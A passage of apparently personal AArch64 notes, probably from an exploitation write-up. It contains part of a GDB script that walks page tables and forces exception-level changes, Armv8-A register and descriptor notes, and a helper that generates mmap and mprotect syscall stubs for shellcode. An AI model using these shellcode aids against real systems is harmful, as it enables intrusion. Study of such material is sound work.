            # d indexed by [20:12]
            x = levels - (level+1) + 3  # 6, 5, 4, 3
            rbit = granule_bits + (x-3)*ent_num_bits
            last_level = (level+1) == levels
            print("granule_bits: %d" % granule_bits)
            print("ent_num_bits: %d" % ent_num_bits)
            print("rbit: %d" % rbit)
            print("---- Level %d ----" % level)
            for va, table_addr in tables:
                print("va: %016lx\ntable_addr: %016lx" % (va, table_addr))
                for ent_no in range(ent_per_table):
                    ent = self.loadq(pt_va_base + table_addr + ent_no*8)
                    # new_va == va_base | (idx of entry << rbit)
                    new_va = va | (ent_no << rbit)
                    # D5-2740
                    # table type entry
                    if (ent & 0b11) == 0b11:
                        if last_level:
                            # last level mapping
                            print("[last] %016lx -> %016lx: %s" % (pt_va_base + table_addr + ent_no*8, new_va, self.format_ent(ent, isS2)))
                        else:
                            print("[table] %016lx == %016lx | (%016lx << %d)" % (new_va, va, ent_no, rbit))
                            # the low 12 bits are ignored bits + type
                            # the masked value is the next-level table address
                            next_tables += [[new_va, (ent & 0xfffffff000)]]
                    # block type entry
                    elif (ent & 0b11) == 0b01:
                        print("[block] %016lx: %s" % (new_va, self.format_ent(ent, isS2)))
            tables = next_tables
            next_tables = []

    def invoke(self, arg, from_tty):
        argv = list(filter(lambda x: x.strip() != "", arg.split(" ")))
        argc = len(argv)
        SAVED_CPSR = 0
        # G8.2.33 CPSR, Current Program Status Register
        CPSR = int(gdb.parse_and_eval("$cpsr")) & 0xffffffff
        # M, bits [3:0] = Current PE mode
        self.CurrentEL = int(CPSR & 0b1100) >> 2
        if argc >= 1:
            try:
                target_el = int(argv[0])
                if target_el < 1 or target_el > 3:
                    print("Invalid argument (ELx >= 1 && ELx <= 3)")
                    return
                if target_el != self.CurrentEL:
                    SAVED_CPSR = CPSR
                    CPSR = CPSR & (0b0011)
                    CPSR |= target_el << 2
                    gdb.parse_and_eval('$cpsr = 0x%08x' % CPSR)
                    print("Moving to EL%d (%s)" % (target_el,
                                                   self.CPSR_Mbit[target_el]))
            except ValueError:
                print("Invalid argument (ELx integer required)")
                pass
        CPSR = int(gdb.parse_and_eval("$cpsr")) & 0xffffffff
        self.CurrentEL = int(CPSR & 0b1100) >> 2
        # target_el is undefined when no argument is given, so report CurrentEL
        print("CPSR: EL%d (%s)" % (self.CurrentEL, self.CPSR_Mbit[self.CurrentEL]))
        try:
            if self.CurrentEL == 0:
                print("No paging in EL0")
            elif self.CurrentEL == 1:
                TTBR0_EL1 = int(gdb.parse_and_eval('$TTBR0_EL1'))
                TTBR1_EL1 = int(gdb.parse_and_eval('$TTBR1_EL1'))
                # D13.2.123 TCR_EL1, Translation Control Register
                # [15:0] - for usermode
                # [31:16] - for kernel
                TCR_EL1 = int(gdb.parse_and_eval('$TCR_EL1'))
                # translation 0/1 region size (user mode/kernel)
                # T0SZ/T1SZ, bits [5:0]/[21:16] = The size offset of the memory region
                # addressed by TTBR0_EL1/TTBR1_EL1
                T0SZ = TCR_EL1 & 0b111111
                T1SZ = (TCR_EL1 >> 16) & 0b111111
                # Granule size for TTBR0_EL1/TTBR1_EL1
                # I think granule size is table size
                TG0 = (TCR_EL1 >> 14) & 0b11
                TG1 = (TCR_EL1 >> 30) & 0b11
                # IPS, bits [34:32] = Intermediate Physical Address Size
                # 0 -> 32, 1 -> 36, 2 -> 40, etc.
                IPS = (TCR_EL1 >> 32) & 0b111
                print("IPA Size: %d-bits" % (32 + 4*IPS))
                if TG0 == 0b00:
                    TG0_BITS = 12  # 4KB
                elif TG0 == 0b01:
                    TG0_BITS = 16  # 64KB
                elif TG0 == 0b10:
                    TG0_BITS = 14  # 16KB
                else:
                    print("TG0 reserved")
                if TG1 == 0b01:
                    TG1_BITS = 14  # 16KB
                elif TG1 == 0b10:
                    TG1_BITS = 12  # 4KB
                elif TG1 == 0b11:
                    TG1_BITS = 16  # 64KB
                else:
                    print("TG1 reserved")
                print("EL1 kernel region min: \t0x%016lx" % (2**64 - 2**(64-T1SZ)))
                print("EL1 user region max: \t0x%016lx" % (2**(64-T0SZ) - 1))
                print("EL1 kernel page size: \t%dKB" % (2**TG1_BITS >> 10))  # / 1024
                print("EL1 user page size: \t%dKB" % (2**TG0_BITS >> 10))  # / 1024
                print("-------- User mode page table --------")
                self.print_table(TTBR0_EL1, TG0_BITS, T0SZ, pt_va_base=KERNEL_BASE)
                print()
                print("-------- Kernel mode page table --------")
                self.print_table(TTBR1_EL1, TG1_BITS, T1SZ, pt_va_base=KERNEL_BASE, upper_region=True)
                print()
        except Exception as e:
            # Report the failure instead of silently swallowing it
            print("pagewalk failed: %s" % e)


Pagewalk()
# source ./pagewalk.py
# gdb> pagewalk
# gdb> pagewalk 1

Others
- `wfi` - puts the CPU into an idle state
- `STP` - store pair
- AArch64 - X30 is the link register (holds the return address)
  - Arm (32-bit) uses LR
The Armv8-A architecture defines a set of Exception levels, EL0 to EL3, where
- If ELn is the Exception level, increased values of n indicate increased software execution privilege
- Execution at EL0 is called unprivileged execution
- EL2 provides support for virtualization
- EL3 provides support for switching between two Security states, Secure state and Non-secure state
state
- Secure state
- When in this state, the PE can access both the Secure physical address space and the Non-secure physical address space
- Non-secure state
- When in this state, the PE can access only the Non-secure physical address space
- Cannot access the Secure system control resources.
EL2
- provides a set of features that support virtualizing an Armv8-A implementation
- The basic model of a virtualized system involves:
- A hypervisor, running in EL2, that is responsible for switching between virtual machines
- A virtual machine comprises EL1 and EL0
- A number of Guest operating systems
- A Guest OS runs on a virtual machine in EL1
- For each Guest operating system, applications, that run on the virtual machine of that Guest OS, usually in EL0
- need to implement all of the virtual interrupts:
- Virtual SError
- Virtual IRQ
- Virtual FIQ
Registers for instruction processing and exception handling (D1.6)
- general-purpose registers, R0-R30 (X0-X30 when accessed as 64-bit, W0-W30 when accessed as 32-bit)
- X0 ~ X7 are used to pass arguments and return results
- SP (register number 31), PC, and so on
- Exception Link Registers (ELRs)
- hold preferred exception return addresses
- Saved Program Status Registers (SPSRs)
- used to save PE state on taking exceptions
- SPSR_EL1, for exceptions taken to EL1 using AArch64
- If EL2 is implemented, SPSR_EL2, for exceptions taken to EL2 using AArch64
- If EL3 is implemented, SPSR_EL3, for exceptions taken to EL3 using AArch64
- When the PE takes an exception, the PE state is saved from PSTATE in the SPSR at the Exception level the exception is taken to
D1.7 Process state (PSTATE)
- In the Armv8-A architecture, Process state or PSTATE is an abstraction of process state information
- All of the instruction sets provide instructions that operate on elements of PSTATE
D1.10 Exception entry
- ELR_ELx
- For an exception taken to an Exception level using AArch64, the Exception Link Register for that Exception level, ELR_ELx, holds the preferred exception return address
- Each EL has its own Vector Base Address Register (VBAR), which holds the base address of the exception vector table
- Asynchronous exceptions
- IRQ
- FIQ
- SError (System Error)
- Synchronous exceptions
- registers related to exceptions
  - `ESR_ELn` - gives information about the reasons for the exception
  - `FAR_ELn` - holds the faulting virtual address for all synchronous instruction and Data Aborts and alignment faults
  - `ELR_ELn` - holds the address of the instruction that caused the aborting data access (for Data Aborts)
- svc / hvc / smc
TTBR_ELx
- D5.3.1 VMSAv8-64 translation table level -1, level 0, level 1, and level 2 descriptor formats
- D5.3.2 Armv8 translation table level 3 descriptor formats
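In both formats the lowest 2 bits determine the descriptor type:
- Invalid - bit 0 is 0 (0b00 or 0b10)
- D_Block - 0b01 (levels 0 to 2)
- D_Table - 0b11 (levels 0 to 2)
- D_Page - 0b11 (level 3)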
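A minimal sketch of that classification is shown below. It is simplified: it ignores which levels actually permit block descriptors for a given granule, and `descriptor_type` is an illustrative helper name.

```python
def descriptor_type(desc, level):
    """Classify a VMSAv8-64 descriptor from its low 2 bits and lookup level."""
    low = desc & 0b11
    if low & 0b1 == 0:
        return "invalid"
    if level == 3:
        # At the last level 0b11 is a page; 0b01 is reserved (treated as invalid)
        return "page" if low == 0b11 else "reserved"
    return "table" if low == 0b11 else "block"


if __name__ == "__main__":
    for desc, level in ((0x0, 0), (0x1B003, 1), (0x40000401, 2), (0x35443, 3)):
        print(hex(desc), "level", level, "->", descriptor_type(desc, level))
```

This is the same test the pagewalk script performs with `(ent & 0b11) == 0b11` and `(ent & 0b11) == 0b01`; the sample descriptor values are made up for illustration.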
P. 2749
- upper attributes
  - `PBHA`: Page-based Hardware Attributes bits
    - These bits are IGNORED when FEAT_HPDS2 is not implemented
  - `UXN`: execute permission; indicates whether the page may be executed at EL0
    - The Execute-never or Unprivileged execute-never field
  - `PXN`: execute permission; indicates whether the page may be executed at the higher EL, i.e. EL1
    - The Privileged execute-never field
  - `Contiguous`: a hint bit indicating that the translation table entry is one of a contiguous set of entries
  - `DBM`: Dirty Bit Modifier
  - `GP`: Guarded Page
- lower attributes
  - `nT`: Block translation entry
  - `nG`: not global
  - `AF`: access flag
  - `SH`: Shareability field
  - `AP`: access permissions
  - `NS`: Non-secure bit
  - `AttrIndx`: Stage 1 memory attributes index field for the MAIR_ELx
SVC
| function | X8 | X0 | X1 | X2 | X3 |
|---|---|---|---|---|---|
| mprotect | 0xE2 | void *addr | size_t len | int prot | - |
| mmap | 0xDE | void *addr | size_t len | int prot | int flags |
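When writing several shellcode variants, the register setup for each call can be generated from this table. The sketch below emits assembly text in the style of the shellcode in this write-up; `SYSCALL_NR` and `svc_stub` are illustrative names, and the `read` number 0x3F is taken from the shellcode rather than from the table.

```python
# Syscall numbers used in this write-up (passed in X8).
SYSCALL_NR = {"read": 0x3F, "mmap": 0xDE, "mprotect": 0xE2}


def svc_stub(name, *args):
    """Return assembly that loads up to six arguments into X0..X5 and issues svc."""
    if len(args) > 6:
        raise ValueError("at most six arguments are supported")
    lines = []
    for reg, arg in enumerate(args):
        # LDR Xn, =imm works for any 64-bit constant, including negative ones
        lines.append("LDR X%d, =0x%x" % (reg, arg & 0xFFFFFFFFFFFFFFFF))
    lines.append("MOV X8, #0x%x" % SYSCALL_NR[name])
    lines.append("SVC 0")
    return "\n".join(lines)


if __name__ == "__main__":
    print(svc_stub("mmap", 0, 0x1000, 3, 0, 0, -1))
    print(svc_stub("mprotect", 0x7FFEFFFFC000, 0x1000, 5))
```

Using `LDR Xn, =imm` for every argument costs a literal pool entry per value, which keeps the generator simple at the expense of shellcode size.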
Registers
MRS / MSR
- MRS - P.1236
  - `_ReadStatusReg` in IDA
- MSR
  - `_WriteStatusReg` in IDA
- Comparable to `INB`, `OUTB`, `INW`, `OUTW` on x86
- P. 3036
- (D13.2.118) SCTLR_EL3 - 6_1_0_0
- Provides top level control of the system, including its memory system, at EL3
- (D13.2.142) VBAR_EL3 - 6_12_0_0
- Holds the vector base address for any exception that is taken to EL3
- (D13.2.115) SCR_EL3 - 6_1_1_0
- Defines the configuration of the current Security state. It specifies
- The Security state of EL0, EL1, and EL2
- The Security state is either Secure or Non-secure
- The Execution state at lower Exception levels
- Whether IRQ, FIQ, SError interrupts, and External abort exceptions are taken to EL3
- Whether various operations are trapped to EL3
- (D13.3.18) MDCR_EL3 - 6_1_3_1
- Provides EL3 configuration options for self-hosted debug and the Performance Monitors Extension
- (D13.2.32) CPTR_EL3 - 6_1_1_2
- Controls trapping to EL3 of accesses to CPACR, CPACR_EL1, HCPTR, CPTR_EL2, trace, Activity Monitor, SVE, and Advanced SIMD and floating-point functionality.
- (D13.2.125) TCR_EL3
- The control register for stage 1 of the EL3 translation regime
- (D13.2.138) TTBR1_EL1 (Translation table (page table))
- Holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the higher VA range in the EL1&0 stage 1 translation regime, and other information for this translation regime
- (D13.2.139) TTBR1_EL2
- HCR_EL2.E2H == 1
- holds the base address of the translation table for the initial lookup for stage 1 of the translation of an address from the higher VA range in the EL2&0 translation regime, and other information for this translation regime
- HCR_EL2.E2H == 0
- the contents of this register are ignored by the PE, except for a direct read or write of the register
- (D13.2.149) VTTBR_EL2
- Holds the base address of the translation table for the initial lookup for stage 2 of an address translation in the EL1&0 translation regime, and other information for this translation regime
Install
# 64 bits
sudo apt install gcc-9-aarch64-linux-gnu
sudo apt install gcc-aarch64-linux-gnu
# 32 bits
sudo apt install gcc-arm-linux-gnueabihf
disassemble
# 64 bits
aarch64-linux-gnu-objdump -d ./bin
# 32 bits
arm-linux-gnueabihf-objdump -d ./bin
debug
gdb-multiarch -q -x script
# script
target remote :1234
# cmd
i r # print all registers











